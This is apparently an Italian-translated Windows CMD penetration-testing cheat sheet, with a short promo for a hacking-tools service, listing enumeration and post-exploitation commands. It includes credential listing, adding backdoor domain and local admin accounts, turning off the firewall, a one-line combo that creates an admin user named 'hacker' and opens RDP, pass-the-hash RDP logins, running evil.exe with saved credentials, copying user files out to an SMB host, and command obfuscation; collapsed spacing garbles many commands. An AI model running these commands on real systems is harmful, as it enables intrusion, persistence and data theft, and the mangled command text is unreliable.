Ottieni la prospettiva di un hacker sulle tue app web, rete e cloud
Trova e segnala vulnerabilità critiche e sfruttabili con un reale impatto sul business. Usa i nostri oltre 20 strumenti personalizzati per mappare la superficie di attacco, trovare problemi di sicurezza che ti permettano di elevare i privilegi e utilizzare exploit automatizzati per raccogliere prove essenziali, trasformando il tuo duro lavoro in report persuasivi.
Informazioni di sistema
Versione e informazioni sulle patch
wmicosgetosarchitecture||echo%PROCESSOR_ARCHITECTURE%#Get architecturesysteminfosysteminfo|findstr/B/C:"OS Name"/C:"OS Version"#Get only that informationwmiccomputersystemLISTfull#Get PC infowmicqfegetCaption,Description,HotFixID,InstalledOn#Patcheswmicqfelistbrief#UpdateshostnameDRIVERQUERY#3rd party driver vulnerable?
Ambiente
set#List all environment variables
Alcune variabili d'ambiente da evidenziare:
COMPUTERNAME: Nome del computer
TEMP/TMP: Cartella temporanea
USERNAME: Il tuo nome utente
HOMEPATH/USERPROFILE: Directory home
windir: C:\Windows
OS: Windows OS
LOGONSERVER: Nome del controller di dominio
USERDNSDOMAIN: Nome di dominio da utilizzare con DNS
USERDOMAIN: Nome del dominio
nslookup%LOGONSERVER%.%USERDNSDOMAIN%#DNS request for DC
schtasks/query/foLIST/v#Verbose out of scheduled tasksschtasks/query/foLIST2>nul|findstrTaskNameschtasks/query/foLIST/v>schtasks.txt; catschtask.txt|grep"SYSTEM\|Task To Run"|grep-B1SYSTEMtasklist/V#List processestasklist/SVC#links processes to started servicesnetstart#Windows Services startedwmicservicelistbrief#List servicesscquery#List of servicesdir/a"C:\Program Files"#Installed softwaredir/a"C:\Program Files (x86)"#Installed softwareregqueryHKEY_LOCAL_MACHINE\SOFTWARE#Installed software
Informazioni sul dominio
# Generic AD infoecho%USERDOMAIN%#Get domain nameecho%USERDNSDOMAIN%#Get domain nameecho%logonserver%#Get name of the domain controllersetlogonserver#Get name of the domain controllersetlog#Get name of the domain controllergpresult/V# Get current policy appliedwmicntdomainlist/format:list#Displays information about the Domain and Domain Controllers# Usersdsqueryuser#Get all usersnetuser/domain#List all users of the domainnetuser<ACCOUNT_NAME>/domain#Get information about that usernetaccounts/domain#Password and lockout policywmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic/NAMESPACE:\\root\directory\ldapPATHds_userGETds_samaccountname#Get all userswmic/NAMESPACE:\\root\directory\ldapPATHds_userwhere"ds_samaccountname='user_name'"GET# Get info of 1 userswmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
# Groupsnetgroup/domain#List of domain groupsnet localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
netgroup"Domain Admins"/domain#List users with domain admin privilegesnetgroup"domain computers"/domain#List of PCs connected to the domainnetgroup"Domain Controllers"/domain#List PC accounts of domains controllerswmicgrouplist/format:list# Information about all local groupswmic/NAMESPACE:\\root\directory\ldapPATHds_groupGETds_samaccountname#Get all groupswmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
# Computersdsquerycomputer#Get all computersnetview/domain#Lis of PCs of the domainnltest/dclist:<DOMAIN>#List domain controllerswmic/NAMESPACE:\\root\directory\ldapPATHds_computerGETds_samaccountname#All computerswmic/NAMESPACE:\\root\directory\ldapPATHds_computerGETds_dnshostname#All computers# Trust relationsnltest/domain_trusts#Mapping of the trust relationships# Get all objects inside an OUdsquery*"CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
Registri ed Eventi
#Make a security query using another credentialswevtutilqesecurity/rd:true/f:text/r:helpline/u:HELPLINE\zachary/p:0987654321
Utenti e Gruppi
Utenti
#Mewhoami/all#All info about me, take a look at the enabled tokenswhoami/priv#Show only privileges# Local usersnetusers#All usersdir/b/ad"C:\Users"netuser%username%#Info about a user (me)netaccounts#Information about password requirementswmicUSERACCOUNTGetDomain,Name,Sidnetuser/add [username] [password] #Create user# Other users loogedqwinsta#Anyone else logged in?#Lauch new cmd.exe with new creds (to impersonate in network)runas/netonly/user<DOMAIN>\<NAME>"cmd.exe"::Thepasswordwillbeprompted#Check current logon session as administrator using logonsessions from sysinternalslogonsessions.exelogonsessions64.exe
Gruppi
#Localnetlocalgroup#All available groupsnetlocalgroupAdministrators#Info about a group (admins)netlocalgroupadministrators [username] /add #Add user to administrators#Domainnetgroup/domain#Info about domain groupsnetgroup/domain<domain_group_name>#Users that belongs to the group
Elenca le sessioni
qwinsta
klist sessions
Politica delle Password
net accounts
Credenziali
cmdkey/list#List credentialvaultcmd/listcreds:"Windows Credentials"/all#List Windows vaultrundll32keymgr.dll,KRShowKeyMgr#You need graphical access
Persistenza con gli utenti
# Add domain user and put them in Domain Admins groupnetuserusernamepassword/ADD/DOMAINnetgroup"Domain Admins"username/ADD/DOMAIN# Add local user and put them local Administrators groupnetuserusernamepassword/ADDnetlocalgroupAdministratorsusername/ADD# Add user to insteresting groups:netlocalgroup"Remote Desktop Users"UserLoginName/addnetlocalgroup"Debugger users"UserLoginName/addnetlocalgroup"Power users"UserLoginName/add
Rete
Interfacce, Rotte, Porte, Host e DNSCache
ipconfig/all#Info about interfacesrouteprint#Print available routesarp-a#Know hostsnetstat-ano#Opened ports?typeC:\WINDOWS\System32\drivers\etc\hostsipconfig/displaydns|findstr"Record"|findstr"Name Host"
Firewall
netshfirewallshowstate# FW info, open portsnetshadvfirewallfirewallshowrulename=allnetshfirewallshowconfig# FW infoNetshAdvfirewallshowallprofilesNetShAdvfirewallsetallprofilesstateoff#Turn OffNetShAdvfirewallsetallprofilesstateon#Trun Onnetshfirewallsetopmodedisable#Turn Off#How to open portsnetshadvfirewallfirewalladdrulename="NetBIOS UDP Port 138"dir=outaction=allowprotocol=UDPlocalport=138netshadvfirewallfirewalladdrulename="NetBIOS TCP Port 139"dir=inaction=allowprotocol=TCPlocalport=139netshfirewalladdportopeningTCP3389"Remote Desktop"#Enable Remote Desktopreg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netshfirewalladdportopeningTCP3389"Remote Desktop"::netshfirewallsetserviceremotedesktopenable#I found that this line is not needed::scconfigTermServicestart=auto#I found that this line is not needed::netstartTermservice#I found that this line is not needed#Enable Remote Desktop with wmicwmicrdtogglewhereAllowTSConnections="0"callSetAllowTSConnections"1"##orwmic/node:remotehostpathWin32_TerminalServiceSettingwhereAllowTSConnections="0"callSetAllowTSConnections"1"#Enable Remote assistance:regadd“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer”/vfAllowToGetHelp/tREG_DWORD/d1/fnetshfirewallsetserviceremoteadminenable#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::ConnecttoRDP (using hashorpassword)xfreerdp/u:alice/d:WORKGROUP/pth:b74242f37e47371aff835a6ebcac4ffe/v:10.11.1.49xfreerdp/u:hacker/d:WORKGROUP/p:Hacker123!/v:10.11.1.49
Condivisioni
netview#Get a list of computersnetview/all/domain [domainname] #Shares on the domainsnetview \\computer/ALL#List shares of a computernetusex: \\computer\share#Mount the share locallynetshare#Check current shares
cd#Get current dircdC:\path\to\dir#Change dirdir#List current dirdir/a:hC:\path\to\dir#List hidden filesdir/s/b#Recursive list without shittime#Get current timedate#Get current dateshutdown/r/t0#Shutdown nowtype<file>#Cat file#Runasrunas/savecred/user:WORKGROUP\Administrator"\\10.XXX.XXX.XXX\SHARE\evil.exe"#Use saved credentialsrunas/netonly/user:<DOMAIN>\<NAME>"cmd.exe"::Thepasswordwillbeprompted#Hideattrib+hfile#Set Hiddenattrib-hfile#Quit Hidden#Give full control over a file that you ownsicacls<FILE_PATH>/t/e/p<USERNAME>:Ficacls<FILE_PATH>/e/r<USERNAME>#Remove the permision#Recursive copy to smbxcopy/hievryC:\Users\security\.yawcam \\10.10.14.13\name\win#exe2bat to transform exe file in bat file#ADSdir/r#Detect ADSmorefile.txt:ads.txt#read ADSpowershell (Get-Content file.txt-Streamads.txt)# Get error messages from codenethelpmsg32#32 is the code in that case
Bypass Char Blacklisting
echo%HOMEPATH:~6,-11%#\who^ami#whoami
DOSfuscation
Genera una riga CMD offuscata
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.gitcd Invoke-DOSfuscationImport-Module .\Invoke-DOSfuscation.psd1Invoke-DOSfuscationhelpSET COMMAND type C:\Users\Administrator\Desktop\flag.txtencoding